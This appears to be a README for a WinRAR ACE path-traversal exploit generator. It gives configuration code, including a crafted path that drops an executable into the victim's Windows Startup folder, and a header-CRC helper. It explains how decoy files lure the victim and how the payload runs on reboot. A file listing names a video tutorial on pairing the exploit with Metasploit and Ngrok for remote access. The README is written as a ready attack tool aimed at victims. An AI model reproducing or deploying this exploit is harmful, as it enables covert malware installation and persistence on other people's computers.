exp for [Extracting Code Execution From Winrar](https://research.checkpoint.com/extracting-code-execution-from-winrar/)
[poc](https://github.com/Ridter/acefile) by Ridter
how to use ?
you just need to install python 3.7, and prepare a evil file you want to run, set the values you want, **this exp script will generate the evil archive file automatically**!
1. set the values you want
```
... ...
# The archive filename you want
rar_filename = "test.rar"
# The evil file you want to run
evil_filename = "calc.exe"
# The decompression path you want, such shown below
target_filename = r"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hi.exe"
# Other files to be displayed when the victim opens the winrar
# filename_list=[]
filename_list = ["hello.txt", "world.txt"]
... ...
def get_right_hdr_crc(filename):
# This command may be different, it depends on the your Python3 environment.
p = os.popen('py -3 acefile.py --headers %s'%(filename))
res = p.read()
pattern = re.compile('right_hdr_crc : 0x(.*?) | struct')
result = pattern.findall(res)
right_hdr_crc = result[0].upper()
return hex2raw4(right_hdr_crc)
... ...
```
2. run the exp, exp generated the `test.rar` automatically
3. if the victim opens the `test.rar`, he will see the file `hello.txt` and `world.txt`, you can also add more files, more attractive files.
4. when he unpacks the file, the victim's user startup directory will have one more file named `hi.exe`, actually it's a `calc.exe`. when he restart the computer, the `hi.exe` will run.
have fun! :)
[4.0K] /data/pocs/d382dab120d8a7989353e372e153bf14146eebad
├── [155K] acefile.py
├── [ 27K] calc.exe
├── [4.0K] exp.py
├── [ 17] hello.txt
├── [2.0K] README.md
├── [ 19M] WinRAR远程代码执行漏洞结合Metasploit Ngrok实现远程上线视频教程.7z
└── [ 17] world.txt
0 directories, 7 files